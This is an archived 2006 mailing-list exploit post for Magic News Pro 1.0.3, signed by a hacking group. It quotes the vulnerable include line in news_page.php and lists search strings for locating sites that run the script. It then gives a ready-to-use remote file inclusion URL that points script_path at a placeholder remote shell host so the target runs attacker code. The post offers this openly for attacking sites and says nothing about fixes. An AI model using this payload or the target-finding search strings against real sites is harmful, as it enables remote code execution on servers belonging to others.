Magic News Pro => 1.0.3 (script_path) Remote File Inclusion Exploit Sep 13 2006 09:11PM
saudi unix hotmail com
#====================================================================

#Magic News Pro => 1.0.3 (script_path) Remote File Inclusion Exploit

#====================================================================

#

#Critical Level : Dangerous

#

#By Saudi Hackrz

#

#http://www.reamdaysoft.com

#http://www.reamdaysoft.com/magic-news-pro/overview.html

#=================================================================

#

#Script Name: Magic News Pro v 1.0.3

#Script :) << $$

#http://www.9q9q.net/up3/index.php?f=jMicDawzV

#

#=================================================================

#Bug in : news_page.php

# include_once($script_path."/config.php");

#

#in <<<< news/scripts/news_page.php

#Serche : "js-news.php?nr=" or "mgic news pro" or "js-news.php"

#=================================================================

#

#Exploit :

#--------------------------------

#

#http://sitename.com/news/scripts/news_page.php?script_path=http://SHELL
URL.COM?

#

#=======================================================================
========

#Discoverd By : Saudi Hackrz

#

#Conatact : Saudi.unix[at]hotmail.com

#

#GreetZ :SnIpEr_Sa , KiNg18 , LeCoPrA And All My Frind :)

#www.S3hr.com . www.elite-team.cc/vb .www.3asfh.net . www.lezr.com/vb .www.xp10.com

========================================================================
=======#

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus